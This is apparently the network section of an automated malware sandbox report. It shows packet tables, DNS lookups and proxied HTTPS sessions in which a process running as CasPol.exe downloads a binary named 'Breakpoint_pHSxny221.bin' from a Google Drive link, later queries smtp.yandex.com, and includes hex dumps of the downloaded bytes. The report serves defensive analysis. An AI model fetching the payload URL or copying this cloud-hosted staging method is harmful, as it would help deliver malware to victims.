                                                        Dec 16, 2021 13:20:35.277082920 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.277391911 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.389735937 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.389789104 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.390517950 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.390832901 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.401498079 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.443892002 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.141838074 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.142100096 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:36.142167091 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.142378092 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:36.142416000 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.142474890 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.142529011 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:36.142580986 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:36.204049110 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:36.204061985 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:36.288825035 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.288840055 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.289006948 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.289385080 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.289391994 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.323530912 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.324002981 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.324230909 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.324481010 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.328032017 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.328161001 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.328577042 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.328785896 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.371887922 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.581609011 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.581840992 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.582262993 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.582559109 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.582868099 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.583470106 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.583591938 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.583663940 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.584737062 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.584906101 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.584913015 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.585185051 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.587326050 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.587661028 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.589993000 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.590329885 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.592175961 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.592359066 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.592365980 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.592503071 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.592509031 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.592691898 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.592696905 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.592835903 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.593183041 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.593322039 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.593327999 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.593642950 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.593971014 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.594150066 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.594156027 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.594400883 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.594674110 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.594933033 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.594939947 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.595401049 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.595407009 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.595928907 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.595933914 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.596210957 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.596218109 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.596417904 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.596422911 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.596560955 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.596873999 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.597135067 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.597141981 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.597296953 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.597569942 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.597759962 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.597767115 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.597985029 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.598226070 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.598479033 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.598484993 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.598712921 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.598980904 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.599343061 CET49838443192.168.11.20142.250.185.129
                                                        Dec 16, 2021 13:20:36.599349022 CET44349838142.250.185.129192.168.11.20
                                                        Dec 16, 2021 13:20:36.599782944 CET44349838142.250.185.129192.168.11.20

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2021 13:20:35.170779943 CET5799553192.168.11.201.1.1.1
                                                        Dec 16, 2021 13:20:35.180243015 CET53579951.1.1.1192.168.11.20
                                                        Dec 16, 2021 13:20:36.247710943 CET5791953192.168.11.201.1.1.1
                                                        Dec 16, 2021 13:20:36.287096977 CET53579191.1.1.1192.168.11.20
                                                        Dec 16, 2021 13:22:12.863843918 CET6070153192.168.11.201.1.1.1
                                                        Dec 16, 2021 13:22:12.873852015 CET53607011.1.1.1192.168.11.20

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Dec 16, 2021 13:20:35.170779943 CET192.168.11.201.1.1.10x851dStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                        Dec 16, 2021 13:20:36.247710943 CET192.168.11.201.1.1.10xa243Standard query (0)doc-00-10-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                        Dec 16, 2021 13:22:12.863843918 CET192.168.11.201.1.1.10xafedStandard query (0)smtp.yandex.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Dec 16, 2021 13:20:35.180243015 CET1.1.1.1192.168.11.200x851dNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)
                                                        Dec 16, 2021 13:20:36.287096977 CET1.1.1.1192.168.11.200xa243No error (0)doc-00-10-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                        Dec 16, 2021 13:20:36.287096977 CET1.1.1.1192.168.11.200xa243No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)
                                                        Dec 16, 2021 13:22:12.873852015 CET1.1.1.1192.168.11.200xafedNo error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                        Dec 16, 2021 13:22:12.873852015 CET1.1.1.1192.168.11.200xafedNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • doc-00-10-docs.googleusercontent.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.11.2049837216.58.212.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2021-12-16 12:20:35 UTC0OUTGET /uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2021-12-16 12:20:36 UTC0INHTTP/1.1 302 Moved Temporarily
                                                        Content-Type: text/html; charset=UTF-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 16 Dec 2021 12:20:36 GMT
                                                        Location: https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                        Content-Security-Policy: script-src 'nonce-PHNJEcMc47TZL6gEF/5QOA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        Server: GSE
                                                        Set-Cookie: NID=511=nz_vCYaDC5iU1dLEvS9DqVbRCCfMRceImHiE6owJVNybu69_MvsDGS7DGyi8y0JnsqzjOUXxwS21SADL475XY73iElP8LV04HQ6wfv5cajLr-dBZVc4lhcuSWxDM6Wbi1nEXWGLW12WMaW-cdA6Bp4xKNN87cnuNcfKQ1sTvVSs; expires=Fri, 17-Jun-2022 12:20:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                        Accept-Ranges: none
                                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2021-12-16 12:20:36 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 31 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 31 68 34 76
                                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4v
                                                        2021-12-16 12:20:36 UTC2INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.11.2049838142.250.185.129443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2021-12-16 12:20:36 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Cache-Control: no-cache
                                                        Host: doc-00-10-docs.googleusercontent.com
                                                        Connection: Keep-Alive
                                                        2021-12-16 12:20:36 UTC2INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: ADPycdvhFMvjHKFqkJh5HdvgD0dLH1sDE9Y-8fUKRa-ZxIQY4hKJvPJevYWe2n-HrZEFRfdt4MsXUpEYHFhUQf4GfdtEdtEMXg
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                        Content-Type: application/octet-stream
                                                        Content-Disposition: attachment;filename="Breakpoint_pHSxny221.bin";filename*=UTF-8''Breakpoint_pHSxny221.bin
                                                        Content-Length: 221248
                                                        Date: Thu, 16 Dec 2021 12:20:36 GMT
                                                        Expires: Thu, 16 Dec 2021 12:20:36 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=D80fJQ==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                        Connection: close
                                                        2021-12-16 12:20:36 UTC6INData Raw: 76 df d8 de 3a 93 80 6e 77 a3 ee 2c 13 b0 da 51 9d d0 ba 61 bb 67 ff 31 bc a7 e6 d5 82 b6 eb ed 61 79 8f 8b c5 25 d5 35 5d 84 cc 62 8b b7 da da 3c f2 69 b9 b3 1f 47 23 95 a8 3b b5 45 6f 95 4c ac 01 ef 40 18 8f 64 6b 99 5a 40 b4 67 d2 72 a8 03 ca 01 01 c0 a9 ca 91 75 e5 f8 4d a7 cb 2e 29 36 3e c5 3a 3b 99 70 ea fc a9 98 2a 7a 38 1a c4 c0 52 1f a4 39 53 f9 a3 f4 e1 9c 12 dd 0e bc 3b 42 b4 be d5 d3 f7 a5 7d c0 6f d6 fe 22 dd 01 4e c0 a9 2a a6 2f 55 bd e7 f5 ec e0 c3 4c e0 f7 b5 b3 69 95 99 36 b7 e9 72 73 4a d8 c0 a7 99 17 10 3b 7a 14 ea b4 9b dd 29 49 04 6a 67 8c a3 c0 b5 01 77 36 c4 ec a5 5f 9c 98 b9 e9 36 64 cd c3 d1 89 17 50 a4 4b 42 dd 0e 41 34 80 85 8c e4 33 6d 1c dd 2a 29 d6 0f fc a8 71 80 93 93 ab 55 ad e8 2d 8d e9 69 5e c4 60 de 42 58 9f 09 84 bc aa
                                                        Data Ascii: v:nw,Qag1ay%5]b<iG#;EoL@dkZ@gruM.)6>:;p*z8R9S;B}o"N*/ULi6rsJ;z)Ijgw6_6dPKBA43m*)qU-i^`BX
                                                        2021-12-16 12:20:36 UTC10INData Raw: ba d4 09 dc 7c cd 80 1d 1f 50 9d b2 ed 19 fb 05 4d 64 e7 84 d0 b7 3c b9 9a 3f 01 d3 22 b3 33 5e bf 81 29 65 c6 2f b0 9a 24 54 bd 98 ce 8f 5d 8b d9 4d 78 19 79 f2 f1 d9 97 e5 45 67 98 5e 01 54 a0 49 9d ce 98 2e ca c5 34 19 4a 7f 23 f2 74 d6 25 f3 65 72 76 84 58 38 e4 88 90 41 6f ce 5d c4 77 31 4c 8f 36 78 fe e4 1e 8f cf fb 31 88 a3 ae 2b 70 8a 09 67 bd 1b 09 a4 da 18 f4 be 9a 42 1a 5b 4c 50 7f 02 ba 69 06 b5 b9 36 3d 50 5f 10 6c 13 73 18 b8 bd 6d ea f8 57 6d 41 73 06 3d d1 7e 65 00 fe de df 9b 1b b1 b4 d4 30 b1 15 b1 e0 e8 95 3c 59 5d 7a d8 f4 31 6f ec da 46 3a 41 bd a3 62 78 c7 13 66 e5 78 d4 7f cd 39 c0 33 b7 db b0 61 07 c1 83 74 a5 3c 2d ca a1 e4 3c c1 ff 84 ae 2f 7b e7 fd 0a a5 ed ec 8a 5f 0f ae b1 50 41 1f 29 f0 38 46 28 aa d6 2d 67 95 40 b4 ed 85 c5
                                                        Data Ascii: |PMd<?"3^)e/$T]MxyEg^TI.4J#t%ervX8Ao]w1L6x1+pgB[LPi6=P_lsmWmAs=~e0<Y]z1oF:Abxfx93at<-</{_PA)8F(-g@
                                                        2021-12-16 12:20:36 UTC13INData Raw: 63 df 9a 99 f4 2c 79 d8 3e b7 bd 56 c3 80 a1 46 5a 07 50 2d ed 91 5f 67 d0 d0 e0 05 b5 b6 e3 1e 48 95 0a b3 15 2f 45 ea e5 ab 06 46 b6 09 58 30 da 38 d5 45 51 d3 e7 23 01 65 d5 be a8 64 05 9f 4f a1 d1 94 25 4a f2 55 d0 34 18 cd de 0c 5a 7f 52 d3 1d bc d8 2f ac 79 c1 8e 4b 57 74 7e 10 9b 07 c3 27 2a d6 d1 95 0c 80 dc 5f 22 49 e6 3c 72 30 a8 b1 17 53 02 93 57 4d 9e 04 c2 d9 2e bc 39 7b 7a 15 44 7e f1 43 af 31 95 aa 93 05 a9 fc 46 dd e9 9b 75 e4 6e 07 38 5a d9 e5 3e bf 85 83 42 b9 c9 eb 9f f5 e4 07 51 87 93 33 4f 2e dc 3e 81 ae 6d fd 46 67 51 70 ea 42 fe 2b ef 66 c5 de 07 91 34 87 be df 0a 22 4f ec fc 0b 16 13 b7 fb ea fb 90 19 ec ee 95 b4 3f b9 f5 1b d0 b4 a4 8e 01 f3 4b ee 14 a9 17 ea 5e 80 4c c6 82 3a dd 6e 0d da 1d 05 3e 75 65 ed 41 82 0b b0 44 7b 3b 74
                                                        Data Ascii: c,y>VFZP-_gH/EFX08EQ#edO%JU4ZR/yKWt~'*_"I<r0SWM.9{zD~C1Fun8Z>BQ3O.>mFgQpB+f4"O?K^L:n>ueAD{;t
                                                        2021-12-16 12:20:36 UTC17INData Raw: 13 74 ab 04 d1 0d 43 bd b8 c9 1d d7 b2 e9 88 5b 26 a9 c1 65 10 5d 3a d0 4b 9b a4 e8 97 2d 8e 93 c9 e1 61 cf fc 16 cf 42 1c 42 2b 9e 0d e3 d6 42 5f 90 15 70 85 44 99 f5 0b 5a 04 6a 6d 9f 84 e8 8d 51 32 3c 1a a0 b5 54 b4 92 6a 44 51 0b 0b c3 d1 83 c9 5f 81 83 75 df 0f 40 26 a3 ad b4 b2 30 67 c2 d5 3b 21 fe e6 fc a8 99 9a 56 93 ab 7f 73 e7 08 a5 de 69 5e ce 33 f7 6a 40 9f 09 8e 60 aa 9a 5a 87 6d 44 7d f6 28 ff 11 6c 9b a0 36 50 3a 59 81 bc ff c5 bb bc b9 db 69 f4 78 95 f8 d0 2a 62 14 a1 ea 13 bd 4d e9 8d c1 f0 22 c0 6b 35 4b c7 3b 04 3a bc 11 24 e4 6d 7f 7a 3d dc fc bf a5 f1 b2 44 be a7 7e 38 97 fa 9e 6c 7b b5 84 6c 09 d6 76 e5 b8 1d 1d 5a 1a b2 be 8a d3 19 4c 64 e1 eb 16 b7 3c b3 e9 9e 29 f6 38 b3 39 77 9c b1 2c 6f 0f 2e a1 92 19 88 bd 89 ca c8 d2 8b d9 4d
                                                        Data Ascii: tC[&e]:K-aBB+B_pDZjmQ2<TjDQ_u@&0g;!Vsi^3j@`ZmD}(l6P:Yix*bM"k5K;:$mz=D~8l{lvZLd<)89w,o.M
                                                        2021-12-16 12:20:36 UTC18INData Raw: 84 95 0b d6 7a c5 fe 05 1d 50 c0 9a 88 82 fb 05 22 a9 e7 84 da 91 2d be 49 8b 01 c1 3c dc fe 5f a4 bb 0a bb de 0b 98 ad 31 54 b7 9a f0 8f 2c 8b d9 4d d2 2a 6b b3 d8 02 91 cd 05 5d f1 aa 91 e0 7e 47 85 89 71 57 89 c5 34 08 23 08 03 bc 7e 0a 5b b9 0a a0 7c 82 45 38 63 88 90 41 70 ef 02 aa 38 31 32 8b 30 50 b6 f1 2d b4 88 6b 33 88 af 80 29 3d 88 0f 49 fa 4a 09 a2 c1 19 f4 3e 9a 42 1a 78 6f 24 45 08 ae 7e 41 d4 b9 36 31 5e cc 28 6d 15 65 15 be 8a 6d e0 e4 04 db 55 60 01 12 86 2a 65 0a 29 f7 d9 f4 43 cf ba de 87 a2 db 7c 57 e8 95 3d 4f d3 77 c0 87 69 7c ac c1 15 28 7e 61 a4 74 6d 62 14 aa cd 06 c3 7e de 3b c3 4a bd d2 a7 4f 78 99 83 72 c0 43 42 92 ab 46 27 90 e0 c6 2c 9a 14 ba 5f 1b ef e7 c1 e2 5a 1e a3 74 01 54 4c 53 ef 29 40 04 d8 ac 2d 6d 8e e7 ca f1 9f ed
                                                        Data Ascii: zP"-I<_1T,M*k]~GqW4#~[|E8cAp8120P-k3)=IJ>Bxo$E~A61^(memU`*e)C|W=Owi|(~atmb~;JOxrCBF',_ZtTLS)@-m
                                                        2021-12-16 12:20:36 UTC19INData Raw: 0c 80 cc 77 04 48 e6 36 5a ab 67 b9 1d 4c 06 1f 08 4d 43 0d ea 42 22 bc 33 53 19 17 44 79 d9 d8 af 31 76 8a eb 07 a7 fa 6e 46 1e 93 7f cc 66 07 38 5c ac 7f 3e be 8f ec 23 b9 ca e8 b7 6e ea 07 5b 98 88 b6 10 2e d3 3f a9 35 77 fd 4c 4e 23 72 ea 44 f6 b9 ef 66 c1 c9 2f b1 1a 8e b8 f7 9e 22 4f e6 f9 01 9a 4d b7 fb eb d3 36 10 ec e4 b3 c7 3d b9 b8 3a 4b b4 ab 84 19 db 71 ee 14 ae 3f 71 5e 80 1c d0 88 b6 8c 6e 0d db 5d 97 3e 75 60 c5 dd 82 11 ba 6e 69 0b 76 8b a3 d5 83 66 3a e2 d3 b3 ca 31 74 a0 b9 ee 5b 7f 40 01 8f 64 6a 9d 5a 40 b4 0c 24 72 a8 b5 ca 01 01 62 a0 ca 91 3a e5 f8 4d bd cb 2e 28 36 3e c5 3a 8a 90 70 ea f2 a9 98 2a c5 31 1a c4 cf 52 1f a4 23 53 f9 a2 f4 e1 9c 12 93 07 bc 3b 42 ab 04 db 0f 4a ac b0 ee d7 d7 b2 f5 fc 55 27 a9 da 0a d6 b6 33 da 95 9a
                                                        Data Ascii: wH6ZgLMCB"3SDy1vnFf8\>#n[.?5wLN#rDf/"OM6=:Kq?q^n]>u`nivf:1t[@djZ@$rb:M.(6>:p*1R#S;BJU'3
